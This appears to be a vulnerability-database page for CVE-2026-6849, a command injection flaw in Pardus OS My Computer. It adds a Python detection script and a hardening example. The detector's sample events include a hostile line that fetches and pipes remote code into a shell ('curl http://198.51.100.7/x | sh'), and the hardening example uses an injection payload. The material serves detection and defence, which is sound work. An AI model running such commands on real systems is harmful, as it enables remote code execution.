CVE-2026-6849

Severity: High · Impact: RCE

Published: 29 April 2026
Modified: 29 April 2026
KEV Added: not listed
Patch: fixed in Pardus OS My Computer 0.8.0
CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
EPSS Score: 0.0012 (30.5th percentile)
Risk Priority: 18 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2026-6849 is a high-severity OS Command Injection (CWE-78) vulnerability in Pardus OS My Computer, maintained by TUBITAK BILGEM Software Technologies Research Institute (vendor and product are inferred from the references and description; NVD filed no CPE). Its CVSS v3.1 base score is 8.8 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Client Execution (T1203), consistent with the UI:R component of the vector: a user must act on attacker-controlled input before commands run. EPSS ranks it at the 30.5th percentile by exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Threat & Defense at a Glance

What attackers do: exploitation maps to Exploitation for Client Execution (T1203) and Unix Shell (T1059.004). What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5, AI-generated mapping)

SI-10 Information Input Validation (prevent)

Directly addresses the improper neutralization of special elements in OS commands by requiring validation of inputs to prevent command injection.

SI-2 Flaw Remediation (prevent)

Mitigates the vulnerability by identifying, reporting, and correcting the specific flaw through patching Pardus OS My Computer to version 0.8.0 or later.

detect

Enables monitoring of the system to detect unauthorized OS command execution resulting from successful injection attempts.

MITRE ATT&CK Enterprise Techniques (AI-generated mapping)

T1203 Exploitation for Client Execution (tactic: Execution)
Adversaries may exploit software vulnerabilities in client applications to execute code.

T1059.004 Command and Scripting Interpreter: Unix Shell (tactic: Execution)
Adversaries may abuse Unix shell commands and scripts for execution.

Why these techniques?

The CVE enables OS command injection in a client application (My Computer in Pardus OS), which is exploitation for client execution (T1203) leading to arbitrary Unix shell command execution (T1059.004).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0
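As an added example for the detect control and the T1059.004 mapping (this is not part of the page's analysis or of Pardus OS), the following Python scans process-creation events and alerts when a watched GUI application spawns a shell whose `-c` command string contains shell control operators, which is what a successful CWE-78 injection looks like at the process level. The JSON event shape, the parent executable path `/usr/bin/pardus-mycomputer` and the sample events are all constructed assumptions; a real deployment would feed the same fields from auditd, eBPF or EDR telemetry.

```python
import json
import shlex
from typing import Optional

# Parent binaries that should never legitimately spawn a shell with chained commands.
# The path is an assumption for this example; adapt it to the installed package.
WATCHED_PARENTS = {"/usr/bin/pardus-mycomputer"}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/sh", "/usr/bin/bash", "/usr/bin/dash"}
CONTROL_OPERATORS = {";", "&&", "||", "|", "&", "(", ")", "`", ">", "<"}

# Constructed sample telemetry (not real logs): one JSON process-creation event per line.
SAMPLE_EVENTS = """\
{"ts": "2026-04-29T10:00:01Z", "pid": 4101, "ppid": 3990, "parent_exe": "/usr/bin/pardus-mycomputer", "exe": "/bin/sh", "argv": ["/bin/sh", "-c", "df -h /mnt/data"]}
{"ts": "2026-04-29T10:00:05Z", "pid": 4102, "ppid": 3990, "parent_exe": "/usr/bin/pardus-mycomputer", "exe": "/bin/sh", "argv": ["/bin/sh", "-c", "df -h /mnt/data; curl http://198.51.100.7/x | sh"]}
{"ts": "2026-04-29T10:00:09Z", "pid": 4103, "ppid": 2201, "parent_exe": "/usr/bin/gnome-terminal", "exe": "/bin/bash", "argv": ["/bin/bash", "-c", "ls; id"]}
{"ts": "2026-04-29T10:00:12Z", "pid": 4104, "ppid": 3990, "parent_exe": "/usr/bin/pardus-mycomputer", "exe": "/usr/bin/df", "argv": ["df", "-h", "--", "/mnt/data"]}
"""


def control_operators(command: str) -> list:
    """Shell control operators found in a command string, tokenised as /bin/sh would see them."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    return [tok for tok in lex if tok in CONTROL_OPERATORS]


def inline_command(argv: list) -> Optional[str]:
    """Return the command string for 'sh -c <cmd>' invocations, else None."""
    if len(argv) >= 3 and argv[1] == "-c":
        return argv[2]
    return None


def evaluate(event: dict) -> Optional[dict]:
    """Alert when a watched parent spawns a shell running a chained or piped command."""
    if event.get("parent_exe") not in WATCHED_PARENTS or event.get("exe") not in SHELLS:
        return None
    command = inline_command(event.get("argv", []))
    if command is None:
        return None
    operators = control_operators(command)
    if not operators:
        return None
    return {
        "ts": event["ts"],
        "pid": event["pid"],
        "parent_exe": event["parent_exe"],
        "technique": "T1059.004",
        "operators": operators,
        "command": command,
    }


def scan(lines: str) -> list:
    """Run evaluate() over newline-delimited JSON events and return the alerts."""
    alerts = []
    for line in lines.splitlines():
        if line.strip():
            alert = evaluate(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Only the second event fires: the first is a plain `df` run through a shell (noisy but not chained), the third comes from a terminal where chained commands are normal, and the fourth never touches a shell at all, which is the process shape the hardened code path should produce.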

NVD Description

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection. This issue affects Pardus OS My Computer: from <=0.7.5 before 0.8.0.

Deeper analysis (AI-generated)

CVE-2026-6849 is an improper neutralization of special elements used in an OS command, enabling OS command injection (CWE-78), in the My Computer component of Pardus OS from TUBITAK BILGEM Software Technologies Research Institute. It affects Pardus OS My Computer versions up to and including 0.7.5 and is fixed in version 0.8.0. It was published on 2026-04-29 with a CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

The vector describes a network-reachable attack of low complexity that needs no privileges but does require user interaction (UI:R): attacker-controlled input has to reach My Computer through a user's action before anything executes. Successful exploitation lets the attacker inject and run arbitrary OS commands in the context of the My Computer process, with high impact on confidentiality, integrity, and availability.

The USOM advisory at https://www.usom.gov.tr/bildirim/tr-26-0131 provides further details. Mitigation is to upgrade Pardus OS My Computer to version 0.8.0 or later.
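To make the SI-10 recommendation and the CWE-78 mechanism concrete, the following is an added example (not code from Pardus OS My Computer, USOM or NVD) contrasting the injectable pattern with a hardened equivalent. The `df -h <mount point>` command, the mount-point allowlist and every function name are assumptions chosen for illustration; the page does not say which command My Computer actually runs or where the untrusted input comes from.

```python
import re
import shlex
import subprocess
from pathlib import PurePosixPath

# Allowlist for an absolute mount point: no whitespace, no shell metacharacters.
# Assumed policy for this example; tighten it to your own path conventions.
MOUNT_POINT_RE = re.compile(r"^/[A-Za-z0-9._/@+-]*$")
SHELL_OPERATORS = {";", "&&", "||", "|", "&", "(", ")", "`", ">", "<"}


def vulnerable_command(mount_point: str) -> str:
    """CWE-78 pattern: untrusted text is interpolated into a shell command line.
    Running this via subprocess.run(cmd, shell=True) hands the whole string to /bin/sh."""
    return f"df -h {mount_point}"


def shell_tokens(command: str) -> list:
    """Tokenise a command line the way a POSIX shell would, keeping operators such as
    ';' and '|' as separate tokens so the injected command becomes visible."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lex)


def injected_operators(command: str) -> list:
    """Shell control operators present in a command line (empty when the line is clean)."""
    return [tok for tok in shell_tokens(command) if tok in SHELL_OPERATORS]


def safe_command(mount_point: str) -> list:
    """Hardened form (SI-10): validate against an allowlist, then build an argv list so
    the value is passed to df as one argument and no shell ever parses it."""
    if not MOUNT_POINT_RE.fullmatch(mount_point):
        raise ValueError(f"rejected mount point: {mount_point!r}")
    if ".." in PurePosixPath(mount_point).parts:
        raise ValueError(f"rejected traversal in mount point: {mount_point!r}")
    # '--' stops df from treating a value that begins with '-' as an option.
    return ["df", "-h", "--", mount_point]


def run_safe(mount_point: str) -> subprocess.CompletedProcess:
    """Execute the hardened command with shell=False (subprocess.run's default)."""
    return subprocess.run(safe_command(mount_point), capture_output=True, text=True, check=False)


if __name__ == "__main__":
    payload = "/mnt/data; id"
    print("vulnerable:", shell_tokens(vulnerable_command(payload)))
    print("operators :", injected_operators(vulnerable_command(payload)))
    print("safe argv :", safe_command("/mnt/data"))
    try:
        safe_command(payload)
    except ValueError as exc:
        print("rejected  :", exc)
```

The two defences are independent: the allowlist rejects the payload before any command is built, and the argv form means that even a value that slipped past validation would reach `df` as a literal argument rather than be re-parsed by a shell. Both are needed in code that currently uses `shell=True`, because removing the shell alone does not stop option injection or traversal.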

Details

CWE(s)

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Affected Products

Pardus OS My Computer (TUBITAK BILGEM Software Technologies Research Institute), versions 0.7.5 and earlier; fixed in 0.8.0.
Vendor and product are inferred from the references and description; NVD did not file a CPE for this CVE.

CVEs Like This One

CVE-2026-24844 (shared CWE-78)
CVE-2026-40032 (shared CWE-78)
CVE-2026-39862 (shared CWE-78)
CVE-2026-33412 (shared CWE-78)
CVE-2026-40030 (shared CWE-78)
CVE-2026-41015 (shared CWE-78)
CVE-2026-5485 (shared CWE-78)
CVE-2025-1244 (shared CWE-78)
CVE-2026-34714 (shared CWE-78)
CVE-2026-33874 (shared CWE-78)

References

USOM advisory TR-26-0131: https://www.usom.gov.tr/bildirim/tr-26-0131
NVD record for CVE-2026-6849: https://nvd.nist.gov/vuln/detail/CVE-2026-6849